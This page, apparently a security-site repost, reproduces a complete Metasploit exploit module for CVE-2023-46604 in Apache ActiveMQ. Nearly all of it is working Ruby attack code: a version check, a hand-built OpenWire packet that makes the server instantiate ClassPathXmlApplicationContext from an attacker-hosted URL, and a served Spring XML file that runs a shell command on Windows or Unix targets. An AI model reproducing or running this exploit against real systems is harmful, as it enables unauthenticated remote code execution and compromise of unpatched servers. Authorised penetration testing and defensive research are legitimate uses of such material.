Exploit/Advisories no image

Published on November 14th, 2023 📆 | 5757 Views ⚑

0

Apache ActiveMQ Unauthenticated Remote Code Execution – Torchsec


https://www.ispeech.org

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Retry

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
5.16.6, and all versions before 5.15.16.
},
'License' => MSF_LICENSE,
'Author' => [
'X1r0z', # Original technical analysis & exploit
'sfewer-r7', # MSF exploit & Rapid7 analysis
],
'References' => [
['CVE', '2023-46604'],
['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
],
'DisclosureDate' => '2023-10-27',
'Privileged' => false,
'Platform' => %w[win linux unix],
'Arch' => [ARCH_CMD],
# The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
# Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
# be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
'Stance' => Stance::Aggressive,
'Targets' => [
[
'Windows',
{
'Platform' => 'win'
}
],
[
'Linux',
{
'Platform' => 'linux'
}
],
[
'Unix',
{
'Platform' => 'unix'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
# By default ActiveMQ listens for OpenWire requests on TCP port 61616.
'RPORT' => 61616,
# The maximum time in seconds to wait for a session.
'WfsDelay' => 30
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def check
connect

res = sock.get_once

disconnect

return CheckCode::Unknown unless res

len, _, magic = res.unpack('NCZ*')

return CheckCode::Unknown unless res.length == len + 4

return CheckCode::Unknown unless magic == 'ActiveMQ'

return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/

version = Rex::Version.new(::Regexp.last_match(1))

ranges = [
['5.18.0', '5.18.2'],
['5.17.0', '5.17.5'],
['5.16.0', '5.16.6'],
['0.0.0', '5.15.15']
]

ranges.each do |min, max|
if version.between?(Rex::Version.new(min), Rex::Version.new(max))
return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
end
end

Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
end





def exploit
# The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.
if payload.encoded.include? ']]>'
fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')
end

start_service

connect

# The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
# leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
# serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
# run an attacker supplied command line via java.lang.ProcessBuilder.start.
clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'

# 31 is the EXCEPTION_RESPONSE data type.
data = [31].pack('C')
# ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
data << [0].pack('N')
# and a 1 byte boolean for response required.
data << [0].pack('C')
# ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
data << [0].pack('N')
# BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
data << [1].pack('C')
# BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
data << [1].pack('C')
# First 2 bytes are the length.
data << [clazz.length].pack('n')
# Then the string data. This is the class name to instantiate.
data << clazz
# Same again for the method string. This is the single string parameter used during class instantiation.
data << [1].pack('C')
data << [get_uri.length].pack('n')
data << get_uri

sock.puts([data.length].pack('N') + data)

retry_until_truthy(timeout: datastore['WfsDelay']) do
!handler_enabled? || session_created?
end

handler
ensure
cleanup
end

def on_request_uri(cli, request)
if request.uri != get_resource
super
end

case target['Platform']
when 'win'
shell = 'cmd.exe'
flag = '/c'
when 'linux', 'unix'
shell = '/bin/sh'
flag = '-c'
end

xml = %(


#{shell}
#{flag}


)

send_response(cli, xml, {
'Content-Type' => 'application/xml',
'Connection' => 'close',
'Pragma' => 'no-cache'
})

print_status('Sent ClassPathXmlApplicationContext configuration file.')
end

end

Source link

Tagged with:



Comments are closed.